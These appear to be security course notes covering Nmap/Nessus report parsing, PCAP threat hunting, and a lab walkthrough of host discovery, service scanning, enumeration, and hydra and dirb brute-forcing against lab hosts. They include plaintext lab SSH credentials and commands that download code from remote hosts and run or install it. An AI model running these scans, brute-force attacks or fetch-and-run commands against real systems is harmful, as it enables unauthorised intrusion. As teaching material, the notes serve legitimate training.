------------------------Type This------------------------------
$data = import-csv weblisteners.csv
$data | where {($_.IPv4 -like "10.57.*") -and ($_.Ports -match "open:tcp:22")}
---------------------------------------------------------------


Export to HTML
------------------------Type This------------------------------
.\parse-nmap.ps1 samplescan.xml -outputdelimiter " " | select-object IPv4,HostName,OS | ConvertTo-Html | out-file report.html
---------------------------------------------------------------


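Parse-Nmap.ps1 hides what it actually does with the XML. The following is an added example (not part of the course notes or of Parse-Nmap.ps1) that parses Nmap's -oX output directly with the [xml] type accelerator and builds the same IPv4 / HostName / OS / Ports shape, so the -like and -match filters from the lab work unchanged. The XML is a constructed, trimmed sample with two hosts, not a real scan; the element and attribute names are the ones Nmap emits.

```powershell
# Added example: Nmap XML to objects without the helper script.
# The XML below is a constructed sample in Nmap's -oX layout.
[xml]$nmapXml = @'
<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -sV -O -oX samplescan.xml 10.57.1.0/24">
  <host>
    <status state="up"/>
    <address addr="10.57.1.10" addrtype="ipv4"/>
    <address addr="00:11:22:33:44:55" addrtype="mac"/>
    <hostnames><hostname name="web1.lab.local" type="PTR"/></hostnames>
    <ports>
      <port protocol="tcp" portid="22"><state state="open"/><service name="ssh"/></port>
      <port protocol="tcp" portid="80"><state state="open"/><service name="http"/></port>
      <port protocol="tcp" portid="443"><state state="closed"/><service name="https"/></port>
    </ports>
    <os><osmatch name="Linux 4.15 - 5.6" accuracy="95"/></os>
  </host>
  <host>
    <status state="up"/>
    <address addr="10.57.1.20" addrtype="ipv4"/>
    <hostnames><hostname name="xp-box.lab.local" type="PTR"/></hostnames>
    <ports>
      <port protocol="tcp" portid="445"><state state="open"/><service name="microsoft-ds"/></port>
      <port protocol="tcp" portid="3389"><state state="open"/><service name="ms-wbt-server"/></port>
    </ports>
    <os><osmatch name="Microsoft Windows XP SP3" accuracy="98"/></os>
  </host>
</nmaprun>
'@

function ConvertFrom-NmapXml {
    param([xml]$Xml)
    foreach ($h in $Xml.nmaprun.host) {
        # A host can carry several <address> elements (ipv4, ipv6, mac).
        $ipv4 = ($h.address | Where-Object { $_.addrtype -eq 'ipv4' } | Select-Object -First 1).addr
        $name = ($h.hostnames.hostname | Select-Object -First 1).name
        $os   = ($h.os.osmatch | Sort-Object { [int]$_.accuracy } -Descending | Select-Object -First 1).name
        # "state:protocol:port:service", so the lab's -like/-match filters still apply.
        $ports = foreach ($p in $h.ports.port) {
            '{0}:{1}:{2}:{3}' -f $p.state.state, $p.protocol, $p.portid, $p.service.name
        }
        [pscustomobject]@{
            IPv4     = $ipv4
            HostName = $name
            OS       = $os
            Ports    = ($ports -join ' ')
        }
    }
}

$hosts = ConvertFrom-NmapXml -Xml $nmapXml

# Same questions as the lab: who has SSH open, which boxes are Windows XP.
# The trailing colon stops "open:tcp:22" from also matching port 2222.
$hosts | Where-Object { $_.Ports -match 'open:tcp:22:' }
$hosts | Where-Object { $_.OS -like '*Windows XP*' } | Format-Table IPv4, HostName, OS

# CSV round trip for reporting.
$csvPath = Join-Path $env:TEMP 'nmap_hosts.csv'
$hosts | Export-Csv -Path $csvPath -NoTypeInformation
Import-Csv $csvPath | Where-Object { $_.Ports -match 'open:tcp:(80|443):' }
```

For a real file replace the here-string with [xml]$nmapXml = Get-Content .\samplescan.xml -Raw. Hosts that were down have no <ports> element, so $h.ports.port is empty and Ports comes back as an empty string rather than an error.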
########################################
# Parsing Nessus scans with PowerShell #
########################################
If you are NOT using the Win7 VM provided then you can get the required files for this lab, which are located in this zip file:
https://infosecaddicts-files.s3.amazonaws.com/PowerShell-Files.zip



Let's take a look at the Import-Csv cmdlet and the members of the objects it returns (one property per CSV column):
------------------------Type This------------------------------
Import-Csv c:\ps\PowerShell-Files\class_nessus.csv | Get-Member
---------------------------------------------------------------

Filter the objects (property names and -eq are case-insensitive, so "high" matches "High"):

------------------------Type This------------------------------
Import-Csv c:\ps\PowerShell-Files\class_nessus.csv | where {$_.risk -eq "high"}
---------------------------------------------------------------

Use the Select-Object cmdlet and only get unique entries. The second command keeps any row whose risk is in a list (-contains tests whether the list on the left contains the value on the right) and shows the chosen columns in a sortable grid:
------------------------Type This------------------------------
Import-Csv c:\ps\PowerShell-Files\class_nessus.csv | where {$_.risk -eq "high"} | select host -Unique

Import-Csv c:\ps\PowerShell-Files\class_nessus.csv | where {"high","medium","low" -contains $_.risk} | select "Plugin ID", CVE, CVSS, Risk, Host, Protocol, Port, Name | Out-GridView
---------------------------------------------------------------

Use the ConvertTo-Html cmdlet and turn it into an HTML report in list format:
------------------------Type This------------------------------
Import-Csv c:\ps\PowerShell-Files\class_nessus.csv | where {"high","medium","low" -contains $_.risk} | select "Plugin ID", CVE, CVSS, Risk, Host, Protocol, Port, Name | ConvertTo-Html -As List > C:\report2.html
---------------------------------------------------------------



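The commands above filter rows one at a time. The following is an added example (not part of the course notes) that turns a Nessus CSV export into the two views a report usually needs: findings ordered by score, and one row per host with counts per risk level. It also shows the trap that Import-Csv makes every column a string, so CVSS has to be cast before sorting or "5.0" sorts above "10.0". The CSV text is constructed for this example using the column names Nessus uses in its CSV export; class_nessus.csv from the lab should work the same way once the here-string is replaced by Import-Csv.

```powershell
# Added example: per-finding and per-host summary of a Nessus CSV export.
# The rows below are constructed for this example.
$csv = @'
"Plugin ID","CVE","CVSS","Risk","Host","Protocol","Port","Name"
"10114","CVE-1999-0524","0.0","None","10.57.1.10","icmp","0","ICMP Timestamp Request Remote Date Disclosure"
"57608","","5.0","Medium","10.57.1.20","tcp","445","SMB Signing not required"
"34477","CVE-2008-4250","10.0","High","10.57.1.20","tcp","445","MS08-067: Microsoft Windows Server Service Crafted RPC Request Handling Remote Code Execution"
"10287","","0.0","None","10.57.1.10","udp","0","Traceroute Information"
"42873","","4.3","Medium","10.57.1.10","tcp","443","SSL Medium Strength Cipher Suites Supported"
"18405","CVE-2005-1794","5.1","Medium","10.57.1.20","tcp","3389","Microsoft Windows Remote Desktop Protocol Server Man-in-the-Middle Weakness"
'@

$findings = $csv | ConvertFrom-Csv

# Every column is text after the import. Cast CVSS once, or Sort-Object
# compares strings and puts "5.0" above "10.0".
$findings = $findings | Select-Object *, @{ n = 'Score'; e = { [double]$_.CVSS } }

# Findings that matter, highest score first. "-in" is the readable form of the
# list -contains value test used in the lab.
$findings | Where-Object { $_.Risk -in 'Critical', 'High', 'Medium' } |
    Sort-Object Score -Descending |
    Select-Object Host, Port, Risk, Score, 'Plugin ID', Name

# One row per host: how many findings at each level and the worst score.
$findings | Group-Object Host | ForEach-Object {
    [pscustomobject]@{
        Host     = $_.Name
        Critical = @($_.Group | Where-Object Risk -eq 'Critical').Count
        High     = @($_.Group | Where-Object Risk -eq 'High').Count
        Medium   = @($_.Group | Where-Object Risk -eq 'Medium').Count
        MaxCVSS  = ($_.Group | Measure-Object Score -Maximum).Maximum
    }
} | Sort-Object MaxCVSS -Descending
```

The @( ) around each Where-Object result matters: with a single match PowerShell returns one object rather than an array, and .Count on it is not what you want in Windows PowerShell 5.1.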
2507 ###################################
2508####################### Introduction to Threat Hunting ################################
2509 ###################################
2510
2511
2512
2513##################################################################
2514# Analyzing a PCAP Prads #
2515# Note: run as regular user #
2516##################################################################
2517
2518---------------------------Type this as a regular user----------------------------------
2519cd ~/yourname
2520
2521mkdir pcap_analysis/
2522
2523cd pcap_analysis/
2524
2525mkdir prads
2526
2527cd prads
2528
2529wget http://45.63.104.73/suspicious-time.pcap
2530
2531prads -r suspicious-time.pcap -l prads-asset.log
2532
2533cat prads-asset.log | less
2534
2535cat prads-asset.log | grep SYN | grep -iE 'windows|linux'
2536
2537cat prads-asset.log | grep CLIENT | grep -iE 'safari|firefox|opera|chrome'
2538
2539cat prads-asset.log | grep SERVER | grep -iE 'apache|linux|ubuntu|nginx|iis'
2540-----------------------------------------------------------------------
2541
2542
2543
2544
2545##################################
2546# PCAP Analysis with ChaosReader #
2547# Note: run as regular user #
2548##################################
2549---------------------------Type this as a regular user----------------------------------
2550cd ~/yourname
2551
2552
2553cd pcap_analysis/
2554
2555mkdir chaos_reader/
2556
2557cd chaos_reader/
2558
2559wget http://45.63.104.73/suspicious-time.pcap
2560
2561wget http://45.63.104.73/chaosreader.pl
2562
2563perl chaosreader.pl suspicious-time.pcap
2564
2565cat index.text | grep -v '"' | grep -oE "([0-9]+\.){3}[0-9]+.*\)"
2566
2567cat index.text | grep -v '"' | grep -oE "([0-9]+\.){3}[0-9]+.*\)" | awk '{print $4, $5, $6}' | sort | uniq -c | sort -nr
2568
2569
2570for i in session_00[0-9]*.http.html; do srcip=`cat "$i" | grep 'http:\ ' | awk '{print $2}' | cut -d ':' -f1`; dstip=`cat "$i" | grep 'http:\ ' | awk '{print $4}' | cut -d ':' -f1`; host=`cat "$i" | grep 'Host:\ ' | sort -u | sed -e 's/Host:\ //g'`; echo "$srcip --> $dstip = $host"; done | sort -u
2571
2572python -m SimpleHTTPServer
2573 ****** Open a web browser and browse the the IP address of your Linux machine port 8000 for the web page *****
2574
2575------------------------------------------------------------------------
2576
2577
2578
2579
2580
2581
2582
2583
2584#############################
2585# PCAP Analysis with tshark #
2586# Note: run as regular user #
2587#############################
2588---------------------------Type this as a regular user---------------------------------
2589cd ~/yourname
2590
2591mkdir pcap_analysis/
2592
2593cd pcap_analysis/
2594
2595mkdir tshark
2596
2597cd tshark
2598
2599wget http://45.63.104.73/suspicious-time.pcap
2600
tshark -r suspicious-time.pcap -qz io,phs
   (no -i <interface> here: -r reads from the pcap file, so a capture interface is not needed)

tshark -r suspicious-time.pcap -qz ip_hosts,tree

tshark -r suspicious-time.pcap -Y "http.request" -Tfields -e "ip.src" -e "http.user_agent" | sort -u
2606
2607tshark -r suspicious-time.pcap -Y "dns" -T fields -e "ip.src" -e "dns.flags.response" -e "dns.qry.name"
2608
2609
2610tshark -r suspicious-time.pcap -Y http.request -T fields -e ip.src -e ip.dst -e http.host -e http.request.uri | awk '{print $1," -> ",$2, "\t: ","http://"$3$4}'
2611
2612whois rapidshare.com.eyu32.ru
2613
2614whois sploitme.com.cn
2615
2616tshark -r suspicious-time.pcap -Y http.request -T fields -e ip.src -e ip.dst -e http.host -e http.request.uri | awk '{print $1," -> ",$2, "\t: ","http://"$3$4}' | grep -v -e '\/image' -e '.css' -e '.ico' -e google -e 'honeynet.org'
2617
2618tshark -r suspicious-time.pcap -qz http_req,tree
2619
2620tshark -r suspicious-time.pcap -Y "data-text-lines contains \"<script\"" -T fields -e frame.number -e ip.src -e ip.dst
2621
2622tshark -r suspicious-time.pcap -Y http.request -T fields -e ip.src -e ip.dst -e http.host -e http.request.uri | awk '{print $1," -> ",$2, "\t: ","http://"$3$4}' | grep -v -e '\/image' -e '.css' -e '.ico' | grep 10.0.3.15 | sed -e 's/\?[^cse].*/\?\.\.\./g'
2623------------------------------------------------------------------------
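The awk/grep pipelines above do the job interactively; here is the same summarisation as reusable shell functions, added as an example for these notes (it is not part of the original lab material). It assumes tshark's tab-separated -T fields output of ip.src, ip.dst, http.host and http.request.uri; the sample lines embedded in it are constructed and are not the real contents of suspicious-time.pcap.

```bash
#!/bin/bash
# Added example (not from the original notes): summarise tshark's
# "-T fields -e ip.src -e ip.dst -e http.host -e http.request.uri" output
# the way the awk/grep pipeline in the notes does, as reusable functions.
# Real usage:
#   tshark -r suspicious-time.pcap -Y http.request -T fields \
#     -e ip.src -e ip.dst -e http.host -e http.request.uri | http_summary
# The sample lines below are constructed for this example; they are not
# the real contents of suspicious-time.pcap.

# Print "src -> dst : url", dropping requests for static assets
# (images, css, favicon) that only add noise when hunting for redirects
# and exploit-kit landing pages.
http_summary() {
    awk -F'\t' '
        NF >= 4 && $3 != "" {
            url = "http://" $3 $4
            if (url ~ /\/image|\.css$|\.ico$|\.png$|\.gif$|\.jpe?g$/) next
            print $1 " -> " $2 " : " url
        }'
}

# Count requests per (client, host) pair, most active first, so a victim
# being bounced between several domains stands out.
http_hosts_by_client() {
    awk -F'\t' 'NF >= 4 && $3 != "" { print $1 "\t" $3 }' \
        | sort | uniq -c | sort -rn
}

# Constructed sample of tshark field output (tab separated).
sample_requests() {
    printf '10.0.3.15\t10.0.4.22\trapidshare.com.eyu32.ru\t/login.php\n'
    printf '10.0.3.15\t10.0.4.22\trapidshare.com.eyu32.ru\t/images/logo.png\n'
    printf '10.0.3.15\t10.0.4.22\trapidshare.com.eyu32.ru\t/style.css\n'
    printf '10.0.3.15\t10.0.4.40\tsploitme.com.cn\t/?click=3feb5a6b2f\n'
    printf '10.0.3.15\t10.0.4.40\tsploitme.com.cn\t/fg/show.php?s=3feb5a6b2f\n'
    printf '10.0.3.15\t10.0.4.50\thoneynet.org\t/favicon.ico\n'
}

sample_requests | http_summary
sample_requests | http_hosts_by_client
```

Pipe real tshark output into http_summary first to get the short list of "interesting" requests, then into http_hosts_by_client to see which domains the victim touched most; the hosts that appear only once or twice are usually the redirector and the exploit server.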
2624
2625
2626
2627
2628
2629
2630
2631
2632
2633
2634
2635
2636
2637
2638Here is the information to put into putty
2639
2640Host Name: 108.61.216.188
2641protocol: ssh
2642port: 22
2643username: hacklab
2644password: hacklab!cybersecurity!
2645
2646
2647
2648
2649
2650
2651
2652-----------------------------------------------------------------------------------------------------------------------------
2653-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
2654-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
2655--------------------------------------------------------------------------------------
2656
2657
2658
2659
2660Some tools to install:
2661---------------------------Type This-----------------------------------
sudo apt install -y libcurl4-openssl-dev zlib1g-dev libssl-dev libidn11-dev libcurses-ocaml-dev libpcre3-dev libpq-dev libsvn-dev libssh-dev libmysqlclient-dev onesixtyone snmp nmap smbclient libnss-winbind winbind
2663-----------------------------------------------------------------------
2664
2665
2666
2667---------------------------Type This-----------------------------------
2668wget --no-check-certificate https://dl.packetstormsecurity.net/UNIX/scanners/propecia.c
2669gcc propecia.c -o propecia
2670sudo cp propecia /bin
2671-----------------------------------------------------------------------
2672
2673
2674
2675
2676##############################
2677# Scanning Process to follow #
2678##############################
2679
2680Step 1: Host Discovery
2681----------------------
2682
2683---------------------------Type This-----------------------------------
nmap -sn 172.31.2.0/24      (ping sweep; -sP is the old spelling of -sn and still works)

nmap -sL 172.31.2.0/24      (list scan: reverse DNS lookups only, no probes are sent)
2687
2688nmap -sS --open -p 22,445 172.31.2.0/24
2689
2690propecia 172.31.2 22 > file1
2691propecia 172.31.2 445 > file2
2692cat file1 file2 > file3
2693cat file3 | sort -t . -k 3,3n -k 4,4n | uniq > lab.txt
2694cat lab.txt
2695-----------------------------------------------------------------------
2696
2697
2698Step 2: Port Scan
2699-----------------
2700nmap -sS <IP-ADDRESS>
2701nmap -sU -p 69,161 <IP-ADDRESS>
2702
2703
2704---------------------------Type This-----------------------------------
2705sudo nmap -sS 172.31.2.0/24
2706sudo nmap -sU -p 69,161 172.31.2.0/24
2707-----------------------------------------------------------------------
2708
2709
2710Step 3: Bannergrab
2711------------------
2712nmap -sV <IP-ADDRESS>
2713nmap -sV -p- <IP-ADDRESS>
2714 |
2715 ----> Vulnerability Research
2716
2717---------------------------Type This-----------------------------------
2718sudo nmap -sV 172.31.2.0/24
2719-----------------------------------------------------------------------
2720
2721
2722
2723
Step 4: Enumerate common Windows/Linux file sharing services
------------------------------------------------------------
Step 3 is where most people STOP; you need to move on and look deeper.
2727
2728---------------------------Type This-----------------------------------
2729sudo apt install smbclient libnss-winbind winbind
2730git clone https://github.com/portcullislabs/enum4linux.git
2731cd enum4linux/
2732perl enum4linux.pl -U 172.31.2.11
2733
2734nmap -Pn -n --open -p111 --script=nfs-ls,nfs-showmount,nfs-statfs,rpcinfo 172.31.2.24
2735---------------------------------------------------------------------------------------
2736
2737
2738
2739Step 5: Vulnerability Scan the webservers
2740-----------------------------------------
2741git clone https://github.com/sullo/nikto.git Nikto2
2742
2743cd Nikto2/program
2744
2745perl nikto.pl -h <IP-ADDRESS>
2746
2747
2748
2749Step 6: Directory Bruteforce every webserver
2750--------------------------------------------
2751sudo apt install -y libcurl4-openssl-dev
2752
2753git clone https://github.com/v0re/dirb.git
2754
2755cd dirb/
2756
2757./configure
2758
2759make
2760
2761./dirb
2762
2763./dirb http://<IP-ADDRESS> wordlists/big.txt
2764
2765
2766
2767
2768
2769Step 7: Analyze source code of all webpages found
2770-------------------------------------------------
2771lynx -dump "http://<IP-ADDRESS>" | grep -o "http:.*" > links
2772
2773If you ever need to download an entire Web site, perhaps for off-line viewing, wget can do the job—for example:
2774
2775$ wget \
2776 --recursive \
2777 --no-clobber \
2778 --page-requisites \
2779 --html-extension \
2780 --convert-links \
2781 --restrict-file-names=windows \
2782 --domains website.org \
2783 --no-parent \
2784 www.website.org/tutorials/html/
2785
2786
2787This command downloads the Web site www.website.org/tutorials/html/.
2788
2789The options are:
2790
2791--recursive: download the entire Web site.
2792
2793--domains website.org: don't follow links outside website.org.
2794
2795--no-parent: don't follow links outside the directory tutorials/html/.
2796
2797--page-requisites: get all the elements that compose the page (images, CSS and so on).
2798
2799--html-extension: save files with the .html extension.
2800
2801--convert-links: convert links so that they work locally, off-line.
2802
2803--restrict-file-names=windows: modify filenames so that they will work in Windows as well.
2804
2805--no-clobber: don't overwrite any existing files (used in case the download is interrupted and resumed).
2806
2807
2808
2809Step 8: Bruteforce any services you find
2810----------------------------------------
sudo apt install -y zlib1g-dev libssl-dev libidn11-dev libcurses-ocaml-dev libpcre3-dev libpq-dev libsvn-dev libssh-dev libmysqlclient-dev
cd ~/toolz
git clone https://github.com/vanhauser-thc/thc-hydra.git
cd thc-hydra
./configure
make
sudo make install
hydra -L username.txt -P passlist.txt ftp://<IP-ADDRESS>
hydra -l user -P passlist.txt ftp://<IP-ADDRESS>
2820
2821
2822
2823##################
2824# Host Discovery #
2825##################
2826
2827Reason:
2828-------
2829You have to discover the reachable hosts in the network before you can attack them.
2830
2831
2832Hosts discovery syntax:
2833-----------------------
    nmap -sn 172.31.2.0/24
2835 propecia 172.31.2 22 > file1
2836 propecia 172.31.2 445 > file2
2837 cat file1 file2 > file3
2838 cat file3 | sort -t . -k 3,3n -k 4,4n | uniq > lab.txt
2839 cat lab.txt
2840
Issues:
-------
The issue we had to deal with was hosts that didn't respond to ICMP, so the nmap ping sweep alone missed them.
That is why the propecia TCP connect sweeps on ports 22 and 445 are run as well and the results merged into lab.txt.
2845
2846 Hosts discovered:
2847 -----------------
2848 172.31.2.24
2849 172.31.2.47
2850 172.31.2.117
2851 172.31.2.181
2852 172.31.2.217
2853 172.31.2.238
2854 172.31.2.254
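Added example, not from the original notes: host discovery without ICMP using only bash and coreutils (a stand-in for propecia when you cannot compile it), plus a merge of the per-port result files that also works across /16 networks. The host lists inside it are constructed.

```bash
#!/bin/bash
# Added example (not from the original notes): host discovery that does not
# depend on ICMP, which is the issue noted above. Instead of propecia it
# uses bash's /dev/tcp and coreutils "timeout", so it works on a box where
# you cannot install or compile tools. The address lists below are
# constructed for this example.

# Try a TCP connect to one host:port; print the IP on success, nothing
# otherwise. Refused and timed-out connections both mean "not listening",
# which is all a discovery sweep needs to know.
tcp_probe() {
    local ip=$1 port=$2
    if timeout 1 bash -c "exec 3<>/dev/tcp/$ip/$port" 2>/dev/null; then
        echo "$ip"
    fi
}

# Sweep a /24 (given as the first three octets, propecia style) on one port.
# Probes run in the background and are waited for, so a /24 takes about a
# second instead of four minutes.
tcp_sweep() {
    local prefix=$1 port=$2 i=1
    while [ "$i" -le 254 ]; do
        tcp_probe "$prefix.$i" "$port" &
        i=$((i + 1))
    done
    wait
}

# Merge any number of per-port host files into one sorted, de-duplicated
# list. Lines that are not dotted-quad addresses (tool chatter) are dropped.
# Sorting on all four octets numerically also works across /16s, where the
# "sort -k 3,3n -k 4,4n" from the notes would not.
merge_hosts() {
    cat "$@" | grep -E '^([0-9]{1,3}\.){3}[0-9]{1,3}$' \
        | sort -t . -k 1,1n -k 2,2n -k 3,3n -k 4,4n -u
}

# Constructed results of two sweeps (port 22 and port 445) to show the merge.
file1=$(mktemp); file2=$(mktemp)
printf '172.31.2.117\n172.31.2.47\n172.31.2.24\n' > "$file1"
printf '172.31.2.11\n172.31.2.47\n172.31.2.14\nnot-an-ip\n' > "$file2"
merge_hosts "$file1" "$file2"
rm -f "$file1" "$file2"
```

Against the lab it is used exactly like the propecia lines above: tcp_sweep 172.31.2 22 > file1; tcp_sweep 172.31.2 445 > file2; merge_hosts file1 file2 > lab.txt. The connect timeout of one second is an assumption; raise it on a slow VPN link.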
2855
2856
2857
2858
2859
2860
2861
2862#####################
2863# Service Discovery #
2864#####################
2865
2866Reason:
2867-------
Identifying which services are running on which hosts lets you map the network and decide what to enumerate next.
2869
2870
2871
2872Port Scan syntax:
2873 sudo nmap -sS -Pn -iL lab.txt
2874 sudo nmap -sU -p69,161 -Pn -iL lab.txt
2875
2876
2877
2878Services discovered:
2879--------------------
2880
2881joe@metasploit-box:~$ sudo nmap -sS -Pn -iL lab.txt
2882
2883Starting Nmap 7.60SVN ( https://nmap.org ) at 2018-05-05 14:52 UTC
2884Nmap scan report for 172.31.2.11
2885Host is up (0.087s latency).
2886Not shown: 995 filtered ports
2887PORT STATE SERVICE
288821/tcp open ftp
2889139/tcp open netbios-ssn
2890445/tcp open microsoft-ds
28913389/tcp open ms-wbt-server
28929999/tcp open abyss
2893
2894Nmap scan report for 172.31.2.11
2895Host is up.
2896
2897PORT STATE SERVICE
289869/udp open|filtered tftp
2899161/udp open|filtered snmp
2900
2901
2902Nmap scan report for 172.31.2.14
2903Host is up (0.087s latency).
2904Not shown: 995 filtered ports
2905PORT STATE SERVICE
290621/tcp open ftp
2907139/tcp open netbios-ssn
2908445/tcp open microsoft-ds
29093389/tcp open ms-wbt-server
29109999/tcp open abyss
2911
2912
2913Nmap scan report for 172.31.2.14
2914Host is up.
2915
2916PORT STATE SERVICE
291769/udp open|filtered tftp
2918161/udp open|filtered snmp
2919
2920
2921Nmap scan report for 172.31.2.47
2922Host is up (0.086s latency).
2923Not shown: 998 closed ports
2924PORT STATE SERVICE
292522/tcp open ssh
292680/tcp open http
2927
2928Nmap scan report for 172.31.2.64
2929Host is up (0.087s latency).
2930Not shown: 997 closed ports
2931PORT STATE SERVICE
293222/tcp open ssh
293380/tcp open http
29346667/tcp open irc
2935
2936Nmap scan report for 172.31.2.86
2937Host is up (0.086s latency).
2938Not shown: 989 closed ports
2939PORT STATE SERVICE
294022/tcp open ssh
294153/tcp open domain
294280/tcp open http
2943110/tcp open pop3
2944111/tcp open rpcbind
2945139/tcp open netbios-ssn
2946143/tcp open imap
2947445/tcp open microsoft-ds
2948993/tcp open imaps
2949995/tcp open pop3s
29508080/tcp open http-proxy
2951
2952Nmap scan report for 172.31.2.117
2953Host is up (0.087s latency).
2954Not shown: 997 closed ports
2955PORT STATE SERVICE
295622/tcp open ssh
295780/tcp open http
29582020/tcp open xinupageserver
2959
2960Nmap scan report for 172.31.2.157
2961Host is up (0.087s latency).
2962Not shown: 997 closed ports
2963PORT STATE SERVICE
296421/tcp open ftp
296522/tcp open ssh
296680/tcp open http
2967
2968Nmap scan report for 172.31.2.217
2969Host is up (0.087s latency).
2970Not shown: 997 closed ports
2971PORT STATE SERVICE
297222/tcp open ssh
297380/tcp open http
29743260/tcp open iscsi
2975
2976Nmap scan report for 172.31.2.238
2977Host is up (0.087s latency).
2978Not shown: 997 closed ports
2979PORT STATE SERVICE
298022/tcp open ssh
298180/tcp open http
29826969/tcp open acmsoda
2983
2984Nmap done: 9 IP addresses (9 hosts up) scanned in 14.82 seconds
2985
2986
2987
2988
2989
2990
2991
2992
2993
2994##############################################
2995# Service Version Discovery (Bannergrabbing) #
2996##############################################
2997Reason:
2998-------
Identifying which versions of the services are running on which hosts lets you determine whether the hosts are vulnerable to attack.
3000
3001
3002
Version scan syntax:
3004
3005joe@metasploit-box:~$ sudo nmap -sV -Pn -iL lab.txt
3006
3007Starting Nmap 7.60SVN ( https://nmap.org ) at 2018-05-05 14:56 UTC
3008Nmap scan report for 172.31.2.11
3009Host is up (0.087s latency).
3010Not shown: 995 filtered ports
3011PORT STATE SERVICE VERSION
301221/tcp open ftp FreeFloat ftpd 1.00
3013139/tcp open netbios-ssn Microsoft Windows netbios-ssn
3014445/tcp open microsoft-ds Microsoft Windows 2003 or 2008 microsoft-ds
30153389/tcp open ms-wbt-server Microsoft Terminal Service
30169999/tcp open abyss?
3017Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_server_2003
3018
3019Nmap scan report for 172.31.2.14
3020Host is up (0.087s latency).
3021Not shown: 995 filtered ports
3022PORT STATE SERVICE VERSION
302321/tcp open ftp FreeFloat ftpd 1.00
3024139/tcp open netbios-ssn Microsoft Windows netbios-ssn
3025445/tcp open microsoft-ds Microsoft Windows 2003 or 2008 microsoft-ds
30263389/tcp open ms-wbt-server Microsoft Terminal Service
30279999/tcp open abyss?
3028Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_server_2003
3029
3030Nmap scan report for 172.31.2.47
3031Host is up (0.087s latency).
3032Not shown: 998 closed ports
3033PORT STATE SERVICE VERSION
303422/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.4 (Ubuntu Linux; protocol 2.0)
303580/tcp open http Apache httpd 2.2.22 ((Ubuntu))
3036Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
3037
3038Nmap scan report for 172.31.2.64
3039Host is up (0.087s latency).
3040Not shown: 997 closed ports
3041PORT STATE SERVICE VERSION
304222/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.6 (Ubuntu Linux; protocol 2.0)
304380/tcp open http Apache httpd 2.4.7 ((Ubuntu))
30446667/tcp open irc ngircd
3045Service Info: Host: irc.example.net; OS: Linux; CPE: cpe:/o:linux:linux_kernel
3046
3047Nmap scan report for 172.31.2.86
3048Host is up (0.087s latency).
3049Not shown: 989 closed ports
3050PORT STATE SERVICE VERSION
305122/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
305253/tcp open domain ISC BIND 9.9.5-3 (Ubuntu Linux)
305380/tcp open http Apache httpd 2.4.7 ((Ubuntu))
3054110/tcp open pop3 Dovecot pop3d
3055111/tcp open rpcbind 2-4 (RPC #100000)
3056139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
3057143/tcp open imap Dovecot imapd (Ubuntu)
3058445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
3059993/tcp open ssl/imap Dovecot imapd (Ubuntu)
3060995/tcp open ssl/pop3 Dovecot pop3d
30618080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
Service Info: Host: SEDNA; OS: Linux; CPE: cpe:/o:linux:linux_kernel, cpe:/o:canonical:ubuntu_linux
3063
3064Nmap scan report for 172.31.2.117
3065Host is up (0.086s latency).
3066Not shown: 997 closed ports
3067PORT STATE SERVICE VERSION
306822/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
306980/tcp open http Apache httpd 2.4.7 ((Ubuntu))
30702020/tcp open ftp vsftpd 2.0.8 or later
3071Service Info: Host: minotaur; OS: Linux; CPE: cpe:/o:linux:linux_kernel
3072
3073Nmap scan report for 172.31.2.157
3074Host is up (0.086s latency).
3075Not shown: 997 closed ports
3076PORT STATE SERVICE VERSION
307721/tcp open ftp vsftpd 2.0.8 or later
307822/tcp open ssh OpenSSH 6.6.1 (protocol 2.0)
307980/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
3080
3081Nmap scan report for 172.31.2.217
3082Host is up (0.087s latency).
3083Not shown: 997 closed ports
3084PORT STATE SERVICE VERSION
308522/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
308680/tcp open http nginx
30873260/tcp open iscsi?
3088Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
3089
3090Nmap scan report for 172.31.2.238
3091Host is up (0.087s latency).
3092Not shown: 997 closed ports
3093PORT STATE SERVICE VERSION
309422/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0)
309580/tcp open http nginx 1.6.2
30966969/tcp open acmsoda?
3097Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
3098
3099Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
3100Nmap done: 9 IP addresses (9 hosts up) scanned in 170.68 seconds
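Added example, not from the original notes: a parser for nmap's normal text output, as pasted above, that emits one CSV line per open port so the service versions can be fed straight into vulnerability research (searchsploit, a vuln database, a spreadsheet). The scan excerpt embedded in it is constructed from the format above, not a real scan.

```bash
#!/bin/bash
# Added example (not from the original notes): turn nmap's normal text
# output (the format pasted above) into one CSV line per open port.
# Real usage on a saved scan:
#   sudo nmap -sV -Pn -iL lab.txt -oN lab-sv.txt && nmap_to_csv lab-sv.txt
# The scan excerpt embedded below is constructed for this example.

# Fields: ip,port,proto,state,service,version
nmap_to_csv() {
    awk '
        # "Nmap scan report for <name> (<ip>)" or "... for <ip>"
        /^Nmap scan report for / {
            ip = $NF
            gsub(/[()]/, "", ip)
            next
        }
        # Port lines look like "22/tcp open ssh OpenSSH 6.6.1p1 ..."
        $1 ~ /^[0-9]+\/(tcp|udp)$/ && $2 ~ /open/ {
            split($1, pp, "/")
            version = ""
            for (i = 4; i <= NF; i++) version = version (i > 4 ? " " : "") $i
            gsub(/"/, "\"\"", version)
            printf "%s,%s,%s,%s,%s,\"%s\"\n", ip, pp[1], pp[2], $2, $3, version
        }' "$@"
}

# Only rows with a version string are worth a CVE lookup; "abyss?" style
# guesses (empty version) need a manual banner grab instead.
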